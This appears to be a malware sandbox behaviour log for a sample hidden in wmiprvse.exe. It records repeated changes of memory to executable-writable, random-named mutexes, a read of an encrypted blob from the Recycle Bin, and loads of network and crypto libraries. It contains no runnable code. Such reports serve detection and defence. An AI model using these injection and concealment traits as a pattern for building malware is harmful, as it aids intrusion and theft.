C:\WINDOWS\system32\wininet.dll query and read commit E80000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E80000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E80000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E80000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E80000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E80000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E80000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ws2_32.dll query and read commit E80000 20480 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\advapi32.dll query and read commit E80000 28672 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\crypt32.dll query and read commit E80000 77824 own pid readonly success or wait 1 BAD6A8A
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\zXeRY3a_PtW|00000000 success or wait 1 C006B4
\BaseNamedObjects\Global\25LSmN0q5Cx8k1GCFvMKe5z0i3US0DM object name exists 1 BAE0EF7
Thread Activities:
+ Thread created
TID PID EIP Injected Filepath Completion Count Source Address
2780 1120 7C8106F9 false C:\WINDOWS\system32\wbem\wmiprvse.exe success or wait 1 C00639
1968 1120 7C8106F9 false C:\WINDOWS\system32\wbem\wmiprvse.exe success or wait 1 BAD6140
1400 1120 7C8106F9 false C:\WINDOWS\system32\wbem\wmiprvse.exe success or wait 1 BAD6140
1928 1120 7C8106F9 false C:\WINDOWS\system32\wbem\wmiprvse.exe success or wait 1 BAD6140
2824 1120 7C8106F9 false C:\WINDOWS\system32\wbem\wmiprvse.exe success or wait 1 BAD6140
+ Thread delayed
TID Delay Completion Count Source Address
6504 0s success or wait 276 BAED21A
6504 0s user apc 3 BAED21A
+ Thread terminated
TID PID Completion Count Source Address
2780 1120 success or wait 0 C00279
Memory Activities:
+ Memory attributes changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe 7C90CFEE 2000 page execute and read and write page execute and read and write success or wait 1 C005EC
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe 7C90D76E 2000 page execute and read and write page execute and write copy success or wait 1 BAE95DC
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe 7C90D76E 2000 page execute and read and write page execute and read and write success or wait 1 BAF2C8B
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe BAF6E20 2000 page execute and read and write page execute and read and write success or wait 1 BAF2C8B
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe 7C90DF1E 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe BB10A90 2000 page execute and read and write page execute and read and write success or wait 1 BAF2CA1
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe 7C90DC5E 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe BAFF2F8 2000 page execute and read and write page execute and read and write success or wait 1 BAF2CB7
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe 7C90D2EE 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe BAFCF58 2000 page execute and read and write page execute and read and write success or wait 1 BAF2CCD
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe 7C90DB3E 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe BB10168 2000 page execute and read and write page execute and read and write success or wait 1 BAF2D09
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe 7E418BF6 2000 page execute and read and write page execute read success or wait 1 BAE95DC
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe 7E418BF6 2000 page execute and read and write page execute and read and write success or wait 1 BAED314
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe BAFC210 2000 page execute and read and write page execute and read and write success or wait 1 BAED314
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe 3D949088 2000 page execute and read and write page execute read success or wait 1 BAE95DC
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe 3D949088 2000 page execute and read and write page execute and read and write success or wait 1 BAF138F
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe BB10D98 2000 page execute and read and write page execute and read and write success or wait 1 BAF138F
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe 3D95EE89 2000 page execute and read and write page execute read success or wait 1 BAE95DC
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe 3D95EE89 2000 page execute and read and write page execute and read and write success or wait 1 BAF13C1
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe BB104E8 2000 page execute and read and write page execute and read and write success or wait 1 BAF13C1
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe 3D94FABE 2000 page execute and read and write page execute read success or wait 1 BAE95DC
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe 3D94FABE 2000 page execute and read and write page execute and read and write success or wait 1 BAF13F4
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe BAF65C8 2000 page execute and read and write page execute and read and write success or wait 1 BAF13F4
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe 3D9A608E 2000 page execute and read and write page execute read success or wait 1 BAE95DC
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe 3D9A608E 2000 page execute and read and write page execute and read and write success or wait 1 BAF1427
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe BAFF660 2000 page execute and read and write page execute and read and write success or wait 1 BAF1427
1120 C:\WINDOWS\system32\wbem\wmiprvse.exe 3D94D508 2000 page execute and read and write page execute read success or wait 1 BAE95DC
System Activities:
+ System information queried
System info class Completion Count Source Address
BasicInformation success or wait 40 BAD6959
ProcessorInformation success or wait 40 BAD6959
+ Chronological sections
Operation Data Completion Time
Mutant created Name: \BaseNamedObjects\zXeRY3a_PtW|00000000 success or wait 2246841239
Thread created PID: 1120 TID: 2780 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\wbem\wmiprvse.exe Injected: false success or wait 2246842408
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2246843381
Section loaded Path: \KnownDlls\CRYPT32.dll Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2246844971
Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and write and read and execute Type: image Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid success or wait 2246845963
Section loaded Path: \KnownDlls\MSASN1.dll Access: write and read and execute Type: unknown Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid object name not found 2246848482
Section loaded Path: C:\WINDOWS\system32\msasn1.dll Access: query and write and read and execute Type: image Baseaddress: 77B20000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 2246849427
Section loaded Path: \KnownDlls\WININET.dll Access: write and read and execute Type: unknown Baseaddress: 3D930000 Size: 942080 Protection: read write Mapped to pid: own pid success or wait 2246857847
Section loaded Path: \KnownDlls\Normaliz.dll Access: write and read and execute Type: unknown Baseaddress: C10000 Size: 36864 Protection: read write Mapped to pid: own pid conflicting addresses 2246866720
Section loaded Path: \KnownDlls\urlmon.dll Access: write and read and execute Type: unknown Baseaddress: 78130000 Size: 1257472 Protection: read write Mapped to pid: own pid success or wait 2246872903
Section loaded Path: \KnownDlls\iertutil.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid success or wait 2246906632
Section loaded Path: \KnownDlls\MSIMG32.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid object name not found 2250115458
Section loaded Path: C:\WINDOWS\system32\msimg32.dll Access: query and write and read and execute Type: image Baseaddress: 76380000 Size: 20480 Protection: read write Mapped to pid: own pid success or wait 2250117090
Thread created PID: 1120 TID: 1968 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\wbem\wmiprvse.exe Injected: false success or wait 2250124984
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: 7C90D76E Length: 2000 New Protection: page execute and read and write New Protection: page execute and write copy success or wait 2250126632
System info queried Type: BasicInformation success or wait 2250126949
Thread delayed Time: 0 TID: 6504 success or wait 2250127766
System info queried Type: ProcessorInformation success or wait 2250127926
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2250128346
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: E80000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2250187744
System info queried Type: BasicInformation success or wait 2250189916
System info queried Type: ProcessorInformation success or wait 2250190237
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: 7C90D76E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2250192302
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: BAF6E20 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2250192650
Thread created PID: 1120 TID: 1400 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\wbem\wmiprvse.exe Injected: false success or wait 2250194263
Thread created PID: 1120 TID: 1928 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\wbem\wmiprvse.exe Injected: false success or wait 2250197060
Thread delayed Time: 0 TID: 6504 success or wait 2250199468
Thread delayed Time: 0 TID: 6504 success or wait 2250199864
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: 7C90DF1E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2250200040
System info queried Type: BasicInformation success or wait 2250200345
System info queried Type: ProcessorInformation success or wait 2250200648
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2250201060
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: E80000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2250204940
System info queried Type: BasicInformation success or wait 2250205800
System info queried Type: ProcessorInformation success or wait 2250206100
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: 7C90DF1E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2250207339
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: BB10A90 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2250207646
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: 7C90DC5E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2250207958
System info queried Type: BasicInformation success or wait 2250208254
System info queried Type: ProcessorInformation success or wait 2250208545
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2250208953
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: E80000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2250211792
System info queried Type: BasicInformation success or wait 2250212093
System info queried Type: ProcessorInformation success or wait 2250212202
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: 7C90DC5E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2250212652
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: BAFF2F8 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2250212764
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: 7C90D2EE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2250212878
System info queried Type: BasicInformation success or wait 2250212986
System info queried Type: ProcessorInformation success or wait 2250213091
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2250213240
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: E80000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2250216032
System info queried Type: BasicInformation success or wait 2250216898
System info queried Type: ProcessorInformation success or wait 2250217199
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: 7C90D2EE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2250218437
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: BAFCF58 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2250218746
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: 7C90DB3E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2250219260
System info queried Type: BasicInformation success or wait 2250219557
System info queried Type: ProcessorInformation success or wait 2250219849
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2250220254
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: E80000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2250224100
System info queried Type: BasicInformation success or wait 2250224918
System info queried Type: ProcessorInformation success or wait 2250225218
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: 7C90DB3E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2250226456
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: BB10168 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2250226764
Section loaded Path: \KnownDlls\nspr4.dll Access: write and read and execute Type: unknown Baseaddress: E80000 Size: 65536 Protection: readonly Mapped to pid: own pid object name not found 2250227777
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2250230318
File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2250233279
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: 7E418BF6 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2250249713
System info queried Type: BasicInformation success or wait 2250249968
System info queried Type: ProcessorInformation success or wait 2250252818
File opened Path: C:\WINDOWS\system32\USER32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2250253253
Section loaded Path: C:\WINDOWS\system32\user32.dll Access: query and read Type: commit Baseaddress: E80000 Size: 57344 Protection: readonly Mapped to pid: own pid success or wait 2250258733
System info queried Type: BasicInformation success or wait 2250260844
System info queried Type: ProcessorInformation success or wait 2250261159
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: 7E418BF6 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2250263861
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: BAFC210 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2250264193
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: 3D949088 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2250264596
System info queried Type: BasicInformation success or wait 2250264907
System info queried Type: ProcessorInformation success or wait 2250265216
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2250265638
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E80000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2250271010
System info queried Type: BasicInformation success or wait 2250273270
System info queried Type: ProcessorInformation success or wait 2250273578
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: 3D949088 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2250276635
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: BB10D98 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2250276943
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: 3D95EE89 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2250277338
System info queried Type: BasicInformation success or wait 2250277649
System info queried Type: ProcessorInformation success or wait 2250277949
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2250278368
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E80000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2250282276
System info queried Type: BasicInformation success or wait 2250284387
System info queried Type: ProcessorInformation success or wait 2250284695
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: 3D95EE89 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2250286427
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: BB104E8 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2250286733
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: 3D94FABE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2250287129
System info queried Type: BasicInformation success or wait 2250287438
System info queried Type: ProcessorInformation success or wait 2250287735
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2250288150
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E80000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2250292143
System info queried Type: BasicInformation success or wait 2250292975
System info queried Type: ProcessorInformation success or wait 2250293279
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: 3D94FABE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2250294969
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: BAF65C8 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2250295271
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: 3D9A608E Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2250295953
System info queried Type: BasicInformation success or wait 2250296260
System info queried Type: ProcessorInformation success or wait 2250296556
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2250296970
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E80000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2250300858
System info queried Type: BasicInformation success or wait 2250302963
System info queried Type: ProcessorInformation success or wait 2250303271
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: 3D9A608E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2250305369
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: BAFF660 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2250305674
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2250306578
File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2250307590
Memory attributes changed PID: 1120 Path: C:\WINDOWS\system32\wbem\wmiprvse.exe Base: 3D94D508 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2250316631
System info queried Type: BasicInformation success or wait 2250316949
System info queried Type: ProcessorInformation success or wait 2250317257
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2250317673
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E80000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2250321651
System info queried Type: BasicInformation success or wait 2250322489
System info queried Type: ProcessorInformation success or wait 2250322795
System info queried Type: BasicInformation success or wait 2250325475
System info queried Type: ProcessorInformation success or wait 2250325774
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2250326191
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E80000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2250330092
System info queried Type: BasicInformation success or wait 2250330926
System info queried Type: ProcessorInformation success or wait 2250331230
System info queried Type: BasicInformation success or wait 2250333915
System info queried Type: ProcessorInformation success or wait 2250334212
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2250334629
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E80000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2250338520
System info queried Type: BasicInformation success or wait 2250340626
System info queried Type: ProcessorInformation success or wait 2250341072
System info queried Type: BasicInformation success or wait 2250343575
System info queried Type: ProcessorInformation success or wait 2250343872
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2250344293
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E80000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2250348288
System info queried Type: BasicInformation success or wait 2250350389
System info queried Type: ProcessorInformation success or wait 2250350699
System info queried Type: BasicInformation success or wait 2250353399
System info queried Type: ProcessorInformation success or wait 2250353696
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2250354112
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E80000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2250358039
System info queried Type: BasicInformation success or wait 2250358873
System info queried Type: ProcessorInformation success or wait 2250359178
System info queried Type: BasicInformation success or wait 2250372990
System info queried Type: ProcessorInformation success or wait 2250373289
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2250373708
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E80000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2250377618
System info queried Type: BasicInformation success or wait 2250378453
System info queried Type: ProcessorInformation success or wait 2250378755
System info queried Type: BasicInformation success or wait 2250381418
System info queried Type: ProcessorInformation success or wait 2250381714
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2250382130
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E80000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2250386020
System info queried Type: BasicInformation success or wait 2250386851
System info queried Type: ProcessorInformation success or wait 2250387237
System info queried Type: BasicInformation success or wait 2250389281
System info queried Type: ProcessorInformation success or wait 2250389390
File opened Path: C:\WINDOWS\system32\WS2_32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2250389541
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and read Type: commit Baseaddress: E80000 Size: 20480 Protection: readonly Mapped to pid: own pid success or wait 2250391569
System info queried Type: BasicInformation success or wait 2250392424
System info queried Type: ProcessorInformation success or wait 2250392532
System info queried Type: BasicInformation success or wait 2250393766
System info queried Type: ProcessorInformation success or wait 2250393869
File opened Path: C:\WINDOWS\system32\ADVAPI32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2250394015
Section loaded Path: C:\WINDOWS\system32\advapi32.dll Access: query and read Type: commit Baseaddress: E80000 Size: 28672 Protection: readonly Mapped to pid: own pid success or wait 2250395948
System info queried Type: BasicInformation success or wait 2250396732
System info queried Type: ProcessorInformation success or wait 2250396840
System info queried Type: BasicInformation success or wait 2250420006
System info queried Type: ProcessorInformation success or wait 2250420110
File opened Path: C:\WINDOWS\system32\CRYPT32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2250420253
Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and read Type: commit Baseaddress: E80000 Size: 77824 Protection: readonly Mapped to pid: own pid success or wait 2250422177
System info queried Type: BasicInformation success or wait 2250423032
System info queried Type: ProcessorInformation success or wait 2250423145
Mutant created Name: \BaseNamedObjects\Global\25LSmN0q5Cx8k1GCFvMKe5z0i3US0DM object name exists 2250424424
Thread created PID: 1120 TID: 2824 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\wbem\wmiprvse.exe Injected: false success or wait 2250425023
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2250431235
Thread delayed Time: 0 TID: 6504 success or wait 2251304967
Thread delayed Time: 0 TID: 6504 success or wait 2251337103
Thread delayed Time: 0 TID: 6504 success or wait 2251337277
Thread delayed Time: 0 TID: 6504 success or wait 2252692853
Thread delayed Time: 0 TID: 6504 success or wait 2252696757
Thread delayed Time: 0 TID: 6504 success or wait 2252700124
Thread delayed Time: 0 TID: 6504 success or wait 2253774850
Thread delayed Time: 0 TID: 6504 success or wait 2253778843
Thread delayed Time: 0 TID: 6504 success or wait 2253782313
Thread delayed Time: 0 TID: 6504 success or wait 2255043472
Thread delayed Time: 0 TID: 6504 success or wait 2255045576
Thread delayed Time: 0 TID: 6504 success or wait 2255047011
Thread delayed Time: 0 TID: 6504 success or wait 2256121281
Thread delayed Time: 0 TID: 6504 success or wait 2256124439
Thread delayed Time: 0 TID: 6504 success or wait 2256129352
Thread delayed Time: 0 TID: 6504 success or wait 2257248608
Thread delayed Time: 0 TID: 6504 success or wait 2257251767
Thread delayed Time: 0 TID: 6504 success or wait 2257255533
Thread delayed Time: 0 TID: 6504 success or wait 2258358188
Thread delayed Time: 0 TID: 6504 success or wait 2258361068
Thread delayed Time: 0 TID: 6504 success or wait 2258365231
Thread delayed Time: 0 TID: 6504 success or wait 2259476888
Thread delayed Time: 0 TID: 6504 success or wait 2259479887
Thread delayed Time: 0 TID: 6504 success or wait 2259484244
Thread delayed Time: 0 TID: 6504 success or wait 2260595117
Thread delayed Time: 0 TID: 6504 success or wait 2260598021
Thread delayed Time: 0 TID: 6504 success or wait 2260602207
Thread delayed Time: 0 TID: 6504 success or wait 2261713772
Thread delayed Time: 0 TID: 6504 success or wait 2261716727
Thread delayed Time: 0 TID: 6504 success or wait 2261721007
Thread delayed Time: 0 TID: 6504 success or wait 2262835840
Thread delayed Time: 0 TID: 6504 success or wait 2262838713
Thread delayed Time: 0 TID: 6504 success or wait 2262842879
Thread delayed Time: 0 TID: 6504 success or wait 2263951205
Thread delayed Time: 0 TID: 6504 success or wait 2263954000
Thread delayed Time: 0 TID: 6504 success or wait 2263958059
Thread delayed Time: 0 TID: 6504 success or wait 2265070097
Thread delayed Time: 0 TID: 6504 success or wait 2265072918
Thread delayed Time: 0 TID: 6504 success or wait 2265077029
Thread delayed Time: 0 TID: 6504 success or wait 2266188446
Thread delayed Time: 0 TID: 6504 success or wait 2266191255
